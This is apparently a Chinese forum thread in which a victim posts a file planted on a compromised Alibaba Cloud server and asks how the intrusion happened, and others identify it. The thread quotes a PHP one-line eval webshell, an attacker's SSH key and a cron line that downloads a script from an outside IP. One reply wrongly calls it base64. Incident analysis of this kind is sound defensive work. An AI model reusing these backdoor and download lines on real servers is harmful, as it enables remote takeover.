以下就是webshell这个文件里写的东西 只知道他是写的指向了一个端口 接收了一个post数据
还有一段ssh的密钥
想请各位朋友帮忙指点一下,他这写的到底是什么?是用什么方式入侵的我阿里云服务器?
REDIS0002� �<?php eval($_POST['kkklll']);?> crackitA�
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAlnc9Af+bT1uPuInyFaGKsq3osX9SpG6e7rXHSrWP5Bo43bH60R9a5btWrkCrhQ6TedyHfGId3T+Qd1jHOjmRrEG0AtyJMB/uo2SffdFkEDbgLCNFoizKOPMJMKazSX3in4WqL3tOkL88uyIzDhjvQ8634jQpvWqrqtTGCipsc8DHw/99L0R07nvuU4iT8wCEIwchOsPaMDn9XTqTqCS37pX95DsT8Xf56j+Y6+ODx5UiLAXxXep6hhmIL9xb6gMQHsMl2+O7b42xPZ3HxMhCgGWdSkEZzGF8QOuBHPMFiDib2GRO2E838kKslswexJUVNs5YmgUQKnWSnjgQ/GoMZQ== crack@redis.io
lloketmbnn@F
*/1 * * * * wget -nc -P /tmp/ http://103.243.27.43:15514/postzm.sh
�
整个文件只有这些东西吗?
<?php eval($_POST['kkklll']);?>
这段方便入侵者随时可以链接上来。
crackitA 还有后面的 wget 下载下来的脚本 是为了拿下你的服务器用的
这个用了base64编码,放在zend studio调试下看看。
这是一句话木马后门,说明网站被黑客攻击,说明你的网站存在很多安全隐患,以及网站漏洞,就算登录服务器找到源文件修复了,也会被黑客再次入侵,只有把网站的所有漏洞找出来,一一进行修复,防止黑客的攻击,避免安全事故发生,如果您对网站漏洞修复不熟悉的话,建议找专业的网站安全公司帮您修复网站漏洞,国内也就Sinesafe和绿盟、启明星辰等安全公司比较专业.